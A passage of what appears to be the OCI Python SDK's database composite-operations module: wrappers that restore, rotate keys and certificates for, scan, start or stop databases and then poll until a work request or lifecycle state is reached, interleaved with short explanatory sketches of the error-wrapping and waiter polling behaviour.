evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def restore_database_and_wait_for_work_request(self, database_id, restore_database_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.restore_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.RestoreDatabaseDetails restore_database_details: (required)
Request to perform database restore.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.restore_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.restore_database(database_id, restore_database_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def restore_database_and_wait_for_state(self, database_id, restore_database_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.restore_database` and waits for the :py:class:`~oci.database.models.Database` acted upon
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.RestoreDatabaseDetails restore_database_details: (required)
Request to perform database restore.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.Database.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.restore_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.restore_database(database_id, restore_database_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
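Every composite above wraps waiter failures in ``oci.exceptions.CompositeOperationError`` so that the already-completed operation response is not lost: the caller can recover it from ``partial_results`` and the original exception from ``cause``. A sketch of that pattern, using an illustrative stand-in class (the attribute names follow the SDK, but this is not the real implementation):

```python
# Illustrative stand-in for oci.exceptions.CompositeOperationError.
class CompositeOperationError(Exception):
    def __init__(self, partial_results=None, cause=None):
        super().__init__(str(cause))
        self.partial_results = partial_results or []
        self.cause = cause

def operation_then_wait(operation, waiter):
    result = operation()  # the initial API call succeeded
    try:
        return waiter(result)
    except Exception as e:
        # Preserve the successful operation response for the caller.
        raise CompositeOperationError(partial_results=[result], cause=e)

def failing_waiter(_):
    raise TimeoutError("waiter timed out")

try:
    operation_then_wait(lambda: {"id": "example-id"}, failing_waiter)
except CompositeOperationError as err:
    print(err.partial_results)       # [{'id': 'example-id'}]
    print(type(err.cause).__name__)  # TimeoutError
```

This is why a timeout while waiting does not mean the clone, restore, or restart itself failed; check ``partial_results`` before retrying the operation.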
def rotate_autonomous_container_database_encryption_key_and_wait_for_work_request(self, autonomous_container_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.rotate_autonomous_container_database_encryption_key` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_container_database_id: (required)
The Autonomous Container Database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.rotate_autonomous_container_database_encryption_key`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.rotate_autonomous_container_database_encryption_key(autonomous_container_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def rotate_autonomous_container_database_encryption_key_and_wait_for_state(self, autonomous_container_database_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.rotate_autonomous_container_database_encryption_key` and waits for the :py:class:`~oci.database.models.AutonomousContainerDatabase` acted upon
to enter the given state(s).
:param str autonomous_container_database_id: (required)
The Autonomous Container Database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousContainerDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.rotate_autonomous_container_database_encryption_key`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.rotate_autonomous_container_database_encryption_key(autonomous_container_database_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_container_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
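The ``waiter_kwargs`` forwarded to ``oci.wait_until`` control the polling cadence: roughly, ``max_interval_seconds`` bounds the pause between polls and ``max_wait_seconds`` bounds the total time before the waiter gives up. A minimal sketch of that loop under those assumptions (the real ``oci.wait_until`` also supports backoff and other options):

```python
import time

def wait_until_sketch(fetch, evaluate_response,
                      max_interval_seconds=30, max_wait_seconds=1200):
    """Minimal sketch of the polling loop oci.wait_until performs."""
    deadline = time.monotonic() + max_wait_seconds
    while True:
        response = fetch()
        if evaluate_response(response):
            return response  # requested state reached
        if time.monotonic() >= deadline:
            raise TimeoutError("resource did not reach the requested state in time")
        time.sleep(max_interval_seconds)  # pause between polls

# Fake resource that becomes AVAILABLE on the third poll.
states = iter(["PROVISIONING", "PROVISIONING", "AVAILABLE"])
result = wait_until_sketch(lambda: next(states),
                           lambda s: s.lower() == "available",
                           max_interval_seconds=0.01, max_wait_seconds=1)
print(result)  # AVAILABLE
```

Passing, say, ``waiter_kwargs={'max_interval_seconds': 60, 'max_wait_seconds': 3600}`` to any composite above would slow the polling and extend the overall timeout accordingly.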
def rotate_autonomous_database_encryption_key_and_wait_for_work_request(self, autonomous_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.rotate_autonomous_database_encryption_key` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.rotate_autonomous_database_encryption_key`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.rotate_autonomous_database_encryption_key(autonomous_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def rotate_autonomous_database_encryption_key_and_wait_for_state(self, autonomous_database_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.rotate_autonomous_database_encryption_key` and waits for the :py:class:`~oci.database.models.AutonomousDatabase` acted upon
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.rotate_autonomous_database_encryption_key`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.rotate_autonomous_database_encryption_key(autonomous_database_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def rotate_ords_certs_and_wait_for_work_request(self, autonomous_exadata_infrastructure_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.rotate_ords_certs` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_exadata_infrastructure_id: (required)
The Autonomous Exadata Infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.rotate_ords_certs`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.rotate_ords_certs(autonomous_exadata_infrastructure_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
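# Usage sketch for the *_and_wait_for_work_request variant above. The work
# request id is read from the operation's `opc-work-request-id` response
# header and polled until a terminal status. `config` and `infra_ocid` are
# placeholders, not defined in this module.
#
#   composite = oci.database.DatabaseClientCompositeOperations(
#       oci.database.DatabaseClient(config))
#   wr_response = composite.rotate_ords_certs_and_wait_for_work_request(infra_ocid)
#   # wr_response.data is the terminal oci.work_requests.models.WorkRequest;
#   # inspect wr_response.data.status for SUCCEEDED / FAILED / CANCELED.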
def rotate_ssl_certs_and_wait_for_work_request(self, autonomous_exadata_infrastructure_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.rotate_ssl_certs` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_exadata_infrastructure_id: (required)
The Autonomous Exadata Infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.rotate_ssl_certs`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.rotate_ssl_certs(autonomous_exadata_infrastructure_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def rotate_vault_key_and_wait_for_work_request(self, database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.rotate_vault_key` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.rotate_vault_key`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.rotate_vault_key(database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def rotate_vault_key_and_wait_for_state(self, database_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.rotate_vault_key` and waits for the :py:class:`~oci.database.models.Database` acted upon
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.Database.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.rotate_vault_key`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.rotate_vault_key(database_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
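# Sketch of tuning the polling behaviour via waiter_kwargs. These keys map
# directly onto oci.wait_until(): max_interval_seconds caps the backoff
# between polls and max_wait_seconds bounds the total wait time. `composite`
# and `db_ocid` are placeholders, not defined in this module.
#
#   composite.rotate_vault_key_and_wait_for_state(
#       db_ocid,
#       wait_for_states=[oci.database.models.Database.LIFECYCLE_STATE_AVAILABLE],
#       waiter_kwargs={'max_interval_seconds': 30, 'max_wait_seconds': 1800})
#   # If the wait times out, oci.wait_until raises, which surfaces here as
#   # oci.exceptions.CompositeOperationError carrying the original operation
#   # response in partial_results.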
def scan_external_container_database_pluggable_databases_and_wait_for_work_request(self, external_container_database_id, external_database_connector_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.scan_external_container_database_pluggable_databases` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str external_container_database_id: (required)
The ExternalContainerDatabase `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str external_database_connector_id: (required)
The `OCID`__ of the
external database connector resource (`ExternalDatabaseConnectorId`).
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.scan_external_container_database_pluggable_databases`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.scan_external_container_database_pluggable_databases(external_container_database_id, external_database_connector_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def start_autonomous_database_and_wait_for_work_request(self, autonomous_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.start_autonomous_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.start_autonomous_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.start_autonomous_database(autonomous_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def start_autonomous_database_and_wait_for_state(self, autonomous_database_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.start_autonomous_database` and waits for the :py:class:`~oci.database.models.AutonomousDatabase` acted upon
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.start_autonomous_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.start_autonomous_database(autonomous_database_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def start_pluggable_database_and_wait_for_work_request(self, pluggable_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.start_pluggable_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str pluggable_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.start_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.start_pluggable_database(pluggable_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def start_pluggable_database_and_wait_for_state(self, pluggable_database_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.start_pluggable_database` and waits for the :py:class:`~oci.database.models.PluggableDatabase` acted upon
to enter the given state(s).
:param str pluggable_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.PluggableDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.start_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.start_pluggable_database(pluggable_database_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_pluggable_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def stop_autonomous_database_and_wait_for_work_request(self, autonomous_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.stop_autonomous_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.stop_autonomous_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.stop_autonomous_database(autonomous_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def stop_autonomous_database_and_wait_for_state(self, autonomous_database_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.stop_autonomous_database` and waits for the :py:class:`~oci.database.models.AutonomousDatabase` acted upon
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.stop_autonomous_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.stop_autonomous_database(autonomous_database_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def stop_pluggable_database_and_wait_for_work_request(self, pluggable_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
